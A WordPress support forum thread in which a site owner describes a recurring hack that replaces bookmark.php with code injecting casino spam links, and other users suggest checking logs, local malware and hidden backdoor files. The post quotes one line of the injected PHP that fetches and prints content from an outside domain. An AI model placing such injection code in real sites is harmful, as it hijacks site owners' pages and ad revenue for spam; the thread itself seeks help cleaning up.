bookmark.php exploit

  • My site has been hacked and after I clean it up it comes back after a week or so. The exploit replaces bookmark.php with a new one that appends a script that begins
    function encoded_optimal(){print file_get_contents(‘https://nadoelo.cn/baza2/21.txt’);}…
    The file that is loaded contains hundreds of links to casino sites, and this causes all my Adsense ads to be casino ads. There may be other things it is doing but this is the most obvious.

    I have not seen other references to this exploit, although if you google “nadoelo.cn” you will see dozens (maybe hundreds) of blogs where this script returns an error. So it must be very common. How to get rid of it once and for all. I have uploaded clean new everything, including plugins, checked db with Exploit Scanner, changed ftp password. Today I am trying removing write permission on bookmark.php.

Viewing 3 replies - 1 through 3 (of 3 total)

  • Might be worth scanning your own computer for malware, in case your FTP password is being stolen.

    See if you can spot anything suspicious in your log files. Speak to your host too. The hack might be coming through another insecure script elsewhere on the server.

    if you can look at your access logs, it could help. Look at the time bookmarks.php was changed, compare to access logs.

    You may see that the file is changed using another file on your server. A file hidden away several folders deep that is giving access to your WP files.

    Aren Cambre

    (@novasource)

    I just helped a site with a similar problem, but wp-blog-header.php is what got hit on that site.

    Sounds like WordPress has a security hole.

    wp-blog-header.php should be 274 bytes but had ballooned to 106,708 bytes.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘bookmark.php exploit’ is closed to new replies.